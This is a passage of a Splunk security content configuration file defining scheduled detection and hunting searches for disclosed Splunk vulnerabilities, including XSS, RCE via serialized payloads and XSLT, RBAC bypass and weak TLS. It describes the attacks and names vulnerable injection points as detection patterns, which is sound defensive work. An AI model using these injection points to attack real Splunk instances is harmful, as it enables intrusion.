["T1189"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise versions below 9.0.4, 8.2.10, and 8.1.13, a low-privileged user can bypass URL validation to perform a path traversal and access restricted and confidential information by targeting other users on the instance, including the admin user. The only affected version of bootstrap which shipped with Splunk was version 2.3.1, so the search is targeted at that version alone. action.escu.how_to_implement = This search does not require additional data to be ingested. This search requires ability to search _internal index. This search helps discover access to vulnerable bootstrap versions. action.escu.known_false_positives = This search will produce numerous false positives as it shows ANY accesses to vulnerable bootstrap Javascript files. Accesses to these files occur during normal Splunk usage. To reduce or eliminate false positives, update the a version of Splunk which has addressed the vulnerability. action.escu.creation_date = 2023-05-09 action.escu.modification_date = 2023-05-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Persistent XSS Via URL Validation Bypass W Dashboard - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Persistent XSS Via URL Validation Bypass W Dashboard - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 20, "cve": ["CVE-2019-8331"], "impact": 80, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_web` method=GET uri_path="*bootstrap-2.3.1*" file="*.js" | table _time clientip uri_path file status | `splunk_persistent_xss_via_url_validation_bypass_w_dashboard_filter` [ESCU - Splunk Process Injection Forwarder Bundle Downloads - Rule] action.escu = 0 action.escu.enabled = 1 description = On June 14th, 2022, Splunk released a security advisory relating to the authentication that happens between Universal Forwarders and Deployment Servers. In some circumstances, an unauthenticated client can download forwarder bundles from the Deployment Server. This hunting search pulls a full list of forwarder bundle downloads where the peer column is the forwarder, the host column is the Deployment Server, and then you have a list of the apps downloaded and the serverclasses in which the peer is a member of. You should look for apps or clients that you do not recognize as being part of your environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = On June 14th, 2022, Splunk released a security advisory relating to the authentication that happens between Universal Forwarders and Deployment Servers. In some circumstances, an unauthenticated client can download forwarder bundles from the Deployment Server. This hunting search pulls a full list of forwarder bundle downloads where the peer column is the forwarder, the host column is the Deployment Server, and then you have a list of the apps downloaded and the serverclasses in which the peer is a member of. You should look for apps or clients that you do not recognize as being part of your environment. action.escu.how_to_implement = This hunting search uses native logs produced when a deployment server is within your environment. Splunk SOAR customers can find a SOAR workbook that walks an analyst through the process of running these hunting searches in the references list of this detection. In order to use this workbook, a user will need to run a curl command to post the file to their SOAR instance such as "curl -u username:password https://soar.instance.name/rest/rest/workbook_template -d @splunk_psa_0622.json". A user should then create an empty container or case, attach the workbook, and begin working through the tasks. action.escu.known_false_positives = None at this time. action.escu.creation_date = 2022-05-26 action.escu.modification_date = 2022-05-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Process Injection Forwarder Bundle Downloads - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Process Injection Forwarder Bundle Downloads - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2022-32157"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd` component="PackageDownloadRestHandler" | stats values(app) values(serverclass) by peer, host | `splunk_process_injection_forwarder_bundle_downloads_filter` [ESCU - Splunk Protocol Impersonation Weak Encryption Configuration - Rule] action.escu = 0 action.escu.enabled = 1 description = On June 14th, 2022, Splunk released a security advisory relating to TLS validation occuring within the httplib and urllib python libraries shipped with Splunk. In addition to upgrading to Splunk Enterprise 9.0 or later, several configuration settings need to be set. This search will check those configurations on the search head it is run from as well as its search peers. In addition to these settings, the PYTHONHTTPSVERIFY setting in $SPLUNK_HOME/etc/splunk-launch.conf needs to be enabled as well. Other components such as additional search heads or anything this rest command cannot be distributed to will need to be manually checked. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1001.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Web"] action.escu.eli5 = On June 14th, 2022, Splunk released a security advisory relating to TLS validation occuring within the httplib and urllib python libraries shipped with Splunk. In addition to upgrading to Splunk Enterprise 9.0 or later, several configuration settings need to be set. This search will check those configurations on the search head it is run from as well as its search peers. In addition to these settings, the PYTHONHTTPSVERIFY setting in $SPLUNK_HOME/etc/splunk-launch.conf needs to be enabled as well. Other components such as additional search heads or anything this rest command cannot be distributed to will need to be manually checked. action.escu.how_to_implement = The user running this search is required to have a permission allowing them to dispatch REST requests to indexers (The `dispatch_rest_to_indexers` capability). Splunk SOAR customers can find a SOAR workbook that walks an analyst through the process of running these hunting searches in the references list of this detection. In order to use this workbook, a user will need to run a curl command to post the file to their SOAR instance such as "curl -u username:password https://soar.instance.name/rest/rest/workbook_template -d @splunk_psa_0622.json". A user should then create an empty container or case, attach the workbook, and begin working through the tasks. action.escu.known_false_positives = While all of the settings on each device returned by this search may appear to be hardened, you will still need to verify the value of PYTHONHTTPSVERIFY in $SPLUNK_HOME/etc/splunk-launch.conf on each device in order to harden the python configuration. action.escu.creation_date = 2022-05-25 action.escu.modification_date = 2022-05-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Protocol Impersonation Weak Encryption Configuration - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Protocol Impersonation Weak Encryption Configuration - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2022-32151"], "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1001.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | rest /services/server/info | table splunk_server version server_roles | join splunk_server [| rest /servicesNS/nobody/search/configs/conf-server/ search="PythonSslClientConfig" | table splunk_server sslVerifyServerCert sslVerifyServerName] | join splunk_server [| rest /servicesNS/nobody/search/configs/conf-web/settings | table splunk_server serverCert sslVersions] | rename sslVerifyServerCert as "Server.conf:PythonSSLClientConfig:sslVerifyServerCert", sslVerifyServerName as "Server.conf:PythonSSLClientConfig:sslVerifyServerName", serverCert as "Web.conf:Settings:serverCert", sslVersions as "Web.conf:Settings:sslVersions" | `splunk_protocol_impersonation_weak_encryption_configuration_filter` [ESCU - Splunk protocol impersonation weak encryption selfsigned - Rule] action.escu = 0 action.escu.enabled = 1 description = On June 14th 2022, Splunk released vulnerability advisory addresing Python TLS validation which was not set before Splunk version 9. This search displays events showing WARNING of using Splunk issued default selfsigned certificates. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1588.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = On June 14th 2022, Splunk released vulnerability advisory addresing Python TLS validation which was not set before Splunk version 9. This search displays events showing WARNING of using Splunk issued default selfsigned certificates. action.escu.how_to_implement = Must upgrade to Splunk version 9 and Configure TLS in order to apply this search. Splunk SOAR customers can find a SOAR workbook that walks an analyst through the process of running these hunting searches in the references list of this detection. In order to use this workbook, a user will need to run a curl command to post the file to their SOAR instance such as "curl -u username:password https://soar.instance.name/rest/rest/workbook_template -d @splunk_psa_0622.json". A user should then create an empty container or case, attach the workbook, and begin working through the tasks. action.escu.known_false_positives = This searches finds self signed certificates issued by Splunk which are not recommended from Splunk version 9 forward. action.escu.creation_date = 2022-05-26 action.escu.modification_date = 2022-05-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk protocol impersonation weak encryption selfsigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk protocol impersonation weak encryption selfsigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2022-32152"], "impact": 50, "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1588.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd` certificate event_message="X509 certificate* should not be used*" | stats count by host CN component log_level | `splunk_protocol_impersonation_weak_encryption_selfsigned_filter` [ESCU - Splunk protocol impersonation weak encryption simplerequest - Rule] action.escu = 0 action.escu.enabled = 1 description = On Splunk version 9 on Python3 client libraries verify server certificates by default and use CA certificate store. This search warns a user about a failure to validate a certificate using python3 request. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1588.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = On Splunk version 9 on Python3 client libraries verify server certificates by default and use CA certificate store. This search warns a user about a failure to validate a certificate using python3 request. action.escu.how_to_implement = Must upgrade to Splunk version 9 and Configure TLS host name validation for Splunk Python modules in order to apply this search. Splunk SOAR customers can find a SOAR workbook that walks an analyst through the process of running these hunting searches in the references list of this detection. In order to use this workbook, a user will need to run a curl command to post the file to their SOAR instance such as "curl -u username:password https://soar.instance.name/rest/rest/workbook_template -d @splunk_psa_0622.json". A user should then create an empty container or case, attach the workbook, and begin working through the tasks. action.escu.known_false_positives = This search tries to address validation of server and client certificates within Splunk infrastructure, it might produce results from accidental or unintended requests to port 8089. action.escu.creation_date = 2022-05-24 action.escu.modification_date = 2022-05-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk protocol impersonation weak encryption simplerequest - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk protocol impersonation weak encryption simplerequest - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2022-32152"], "impact": 50, "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1588.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunk_python` "simpleRequest SSL certificate validation is enabled without hostname verification" | stats count by host path | `splunk_protocol_impersonation_weak_encryption_simplerequest_filter` [ESCU - Splunk RBAC Bypass On Indexing Preview REST Endpoint - Rule] action.escu = 0 action.escu.enabled = 1 description = An unauthorized user can use the /services/indexing/preview REST endpoint to overwrite search results if they know the search ID (SID) of an existing search job. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = An unauthorized user can use the /services/indexing/preview REST endpoint to overwrite search results if they know the search ID (SID) of an existing search job. action.escu.how_to_implement = This search does not require additional data ingestion. It requires the ability to search _internal index. action.escu.known_false_positives = This is a hunting search which provides verbose results against this endpoint. Operator must consider things such as IP address, useragent and user(specially low privelege) and host to investigate possible attack. action.escu.creation_date = 2023-05-10 action.escu.modification_date = 2023-05-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk RBAC Bypass On Indexing Preview REST Endpoint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk RBAC Bypass On Indexing Preview REST Endpoint - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkda` method="POST" uri="*/services/indexing/preview*" | table host clientip status useragent user uri_path | `splunk_rbac_bypass_on_indexing_preview_rest_endpoint_filter` [ESCU - Splunk RCE via Serialized Session Payload - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise versions lower than 8.2.12, 9.0.6, and 9.1.1, an attacker can execute a specially crafted query that they can then use to serialize untrusted data. The attacker can use the query to execute arbitrary code. The exploit requires the use of the 'collect' SPL command which writes a file within the Splunk Enterprise installation. The attacker can then use this file to submit a serialized payload that can result in execution of code within the payload. Please refer to the following URL for additional information on these disclosures - https://advisory.splunk.com action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise versions lower than 8.2.12, 9.0.6, and 9.1.1, an attacker can execute a specially crafted query that they can then use to serialize untrusted data. The attacker can use the query to execute arbitrary code. The exploit requires the use of the 'collect' SPL command which writes a file within the Splunk Enterprise installation. The attacker can then use this file to submit a serialized payload that can result in execution of code within the payload. Please refer to the following URL for additional information on these disclosures - https://advisory.splunk.com action.escu.how_to_implement = Requires access to the _audit index. action.escu.known_false_positives = There are numerous many uses of the 'makeresults' and 'collect' SPL commands. Please evaluate the results of this search for potential abuse. action.escu.creation_date = 2023-10-02 action.escu.modification_date = 2023-10-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk RCE via Serialized Session Payload - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk RCE via Serialized Session Payload - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-40595"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `audit_searches` file=* (search="*makeresults*" AND search="*collect*") | stats count min(_time) as firstTime max(_time) as lastTime by action file user splunk_server search | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_rce_via_serialized_session_payload_filter` [ESCU - Splunk RCE via Splunk Secure Gateway Splunk Mobile alerts feature - Rule] action.escu = 0 action.escu.enabled = 1 description = This hunting search provides information on possible exploitation attempts against Splunk Secure Gateway App Mobile Alerts feature in Splunk versions 9.0, 8.2.x, 8.1.x. An authenticated user can run arbitrary operating system commands remotely through the use of specially crafted requests to the mobile alerts feature in the Splunk Secure Gateway app. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This hunting search provides information on possible exploitation attempts against Splunk Secure Gateway App Mobile Alerts feature in Splunk versions 9.0, 8.2.x, 8.1.x. An authenticated user can run arbitrary operating system commands remotely through the use of specially crafted requests to the mobile alerts feature in the Splunk Secure Gateway app. action.escu.how_to_implement = This search only applies if Splunk Mobile Gateway is deployed in the vulnerable Splunk versions. action.escu.known_false_positives = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. Focus of this search is "uri_path=/servicesNS/nobody/splunk_secure_gateway/storage/collections/data/mobile_alerts*" which is the injection point. action.escu.creation_date = 2022-10-11 action.escu.modification_date = 2022-10-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk RCE via Splunk Secure Gateway Splunk Mobile alerts feature - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk RCE via Splunk Secure Gateway Splunk Mobile alerts feature - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2022-43567"], "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkda` uri_path="/servicesNS/nobody/splunk_secure_gateway/storage/collections/data/mobile_alerts*" sort="notification.created_at:-1" | table clientip file host method uri_query sort | `splunk_rce_via_splunk_secure_gateway__splunk_mobile_alerts_feature_filter` [ESCU - Splunk RCE via User XSLT - Rule] action.escu = 0 action.escu.enabled = 1 description = This search provides information to investigate possible remote code execution exploitation via user-supplied Extensible Stylesheet Language Transformations (XSLT), affecting Splunk versions 9.1.x. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information to investigate possible remote code execution exploitation via user-supplied Extensible Stylesheet Language Transformations (XSLT), affecting Splunk versions 9.1.x. action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. action.escu.known_false_positives = This search will provide information for investigation and hunting possible abuse of user-supplied XSLT. There may be false positives and results should individually evaluated. Please evaluate the source IP and useragent responsible for creating the requests. action.escu.creation_date = 2023-11-22 action.escu.modification_date = 2023-11-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk RCE via User XSLT - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk RCE via User XSLT - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_ui` ((uri="*NO_BINARY_CHECK=1*" AND "*input.path=*.xsl*") OR uri="*dispatch*.xsl*") AND uri!= "*splunkd_ui*" | rex field=uri "(?=\s*([\S\s]+))" | eval decoded_field=urldecode(string) | eval action=case(match(status,"200"),"Allowed",match(status,"303|500|401|403|404|301|406"),"Blocked",1=1,"Unknown") | stats count min(_time) as firstTime max(_time) as lastTime by clientip useragent uri decoded_field action host | rename clientip as src, uri as dest_uri | iplocation src | fillnull value="N/A" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime, lastTime src, useragent, action, count, Country, Region, City, dest_uri, decoded_field [ESCU - Splunk Reflected XSS in the templates lists radio - Rule] action.escu = 0 action.escu.enabled = 1 description = Splunk versions below 8.1.12,8.2.9 and 9.0.2 are vulnerable to reflected cross site scripting (XSS). A View allows for a Reflected Cross Site scripting via JavaScript Object Notation (JSON) in a query parameter when ouput_mode=radio. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = Splunk versions below 8.1.12,8.2.9 and 9.0.2 are vulnerable to reflected cross site scripting (XSS). A View allows for a Reflected Cross Site scripting via JavaScript Object Notation (JSON) in a query parameter when ouput_mode=radio. action.escu.how_to_implement = This vulnerability only affects instances with Splunk Web enabled. This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. action.escu.known_false_positives = This search may produce false positives as it is difficult to pinpoint all possible XSS injection characters in a single search string. Special attention is required to "en-US/list/entities/x/ui/views" which is the vulnerable injection point. action.escu.creation_date = 2022-10-11 action.escu.modification_date = 2022-10-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Reflected XSS in the templates lists radio - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Reflected XSS in the templates lists radio - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2022-43568"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_webx` user=admin status=200 uri=*/lists/entities/x/ui/views* uri_query!=null | stats count earliest(_time) as event_time values(status) as status values(clientip) as clientip by index, sourcetype, _time, host, user, uri | `splunk_reflected_xss_in_the_templates_lists_radio_filter` [ESCU - Splunk Reflected XSS on App Search Table Endpoint - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise versions below 9.1.1, 9.0.6, and 8.2.12, an attacker can craft a special web request that can result in reflected cross-site scripting XSS on the app search table web endpoint, which presents as the Create Table View page in Splunk Web. Exploitation of this vulnerability can lead to the execution of arbitrary commands on the Splunk platform instance. A JavaScript file within this web endpoint does not properly validate input which lets an attacker insert a payload into a function. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise versions below 9.1.1, 9.0.6, and 8.2.12, an attacker can craft a special web request that can result in reflected cross-site scripting XSS on the app search table web endpoint, which presents as the Create Table View page in Splunk Web. Exploitation of this vulnerability can lead to the execution of arbitrary commands on the Splunk platform instance. A JavaScript file within this web endpoint does not properly validate input which lets an attacker insert a payload into a function. action.escu.how_to_implement = Need access to the internal indexes. action.escu.known_false_positives = This search will produce false positives. It is necessary to also look at uri_query parameter to determine the possible malicious intention of inserting makeresults within the uri string. action.escu.creation_date = 2023-09-05 action.escu.modification_date = 2023-09-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Reflected XSS on App Search Table Endpoint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Reflected XSS on App Search Table Endpoint - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 40, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_web` (dataset_commands="*makeresults*" AND dataset_commands="*count*" AND dataset_commands="*eval*" AND dataset_commands="*baseSPL*") | stats count min(_time) as firstTime max(_time) as lastTime by clientip status user view root uri_path | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `splunk_reflected_xss_on_app_search_table_endpoint_filter` [ESCU - Splunk risky Command Abuse disclosed february 2023 - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for a variety of high-risk commands throughout a number of different Splunk Vulnerability Disclosures. Please refer to the following URL for additional information on these disclosures - https://advisory.splunk.com action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548", "T1202"], "nist": ["DE.AE"]} action.escu.data_models = ["Splunk_Audit"] action.escu.eli5 = This search looks for a variety of high-risk commands throughout a number of different Splunk Vulnerability Disclosures. Please refer to the following URL for additional information on these disclosures - https://advisory.splunk.com action.escu.how_to_implement = Requires implementation of Splunk_Audit.Search_Activity datamodel. action.escu.known_false_positives = This search encompasses many commands. action.escu.creation_date = 2024-01-22 action.escu.modification_date = 2024-01-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk risky Command Abuse disclosed february 2023 - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk risky Command Abuse disclosed february 2023 - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-22931", "CVE-2023-22934", "CVE-2023-22935", "CVE-2023-22936", "CVE-2023-22939", "CVE-2023-22940", "CVE-2023-40598", "CVE-2023-40598", "CVE-2023-46214", "CVE-2024-23676"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548", "T1202"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats fillnull_value="N/A" count min(_time) as firstTime max(_time) as lastTime from datamodel=Splunk_Audit.Search_Activity where Search_Activity.search_type=adhoc Search_Activity.user!=splunk-system-user by Search_Activity.search Search_Activity.info Search_Activity.total_run_time Search_Activity.user Search_Activity.search_type | `drop_dm_object_name(Search_Activity)` | lookup splunk_risky_command splunk_risky_command as search output splunk_risky_command description vulnerable_versions CVE other_metadata | where splunk_risky_command != "false" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_risky_command_abuse_disclosed_february_2023_filter` [ESCU - Splunk Stored XSS via Data Model objectName field - Rule] action.escu = 0 action.escu.enabled = 1 description = Splunk Enterprise versions 8.1.12, 8.2.9, 9.0.2 are vulnerable to persistent cross site scripting via Data Model object name. An authenticated user can inject and store arbitrary scripts that can lead to persistent cross-site scripting (XSS) in the object name Data Model. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = Splunk Enterprise versions 8.1.12, 8.2.9, 9.0.2 are vulnerable to persistent cross site scripting via Data Model object name. An authenticated user can inject and store arbitrary scripts that can lead to persistent cross-site scripting (XSS) in the object name Data Model. action.escu.how_to_implement = This vulnerability only affects Splunk Web enabled instances. This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. action.escu.known_false_positives = This search may produce false positives and does not cover exploitation attempts via code obfuscation, focus of search is suspicious requests against "/en-US/splunkd/__raw/servicesNS/*/launcher/datamodel/model" which is the injection point. action.escu.creation_date = 2022-10-11 action.escu.modification_date = 2022-10-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Stored XSS via Data Model objectName field - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Stored XSS via Data Model objectName field - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk 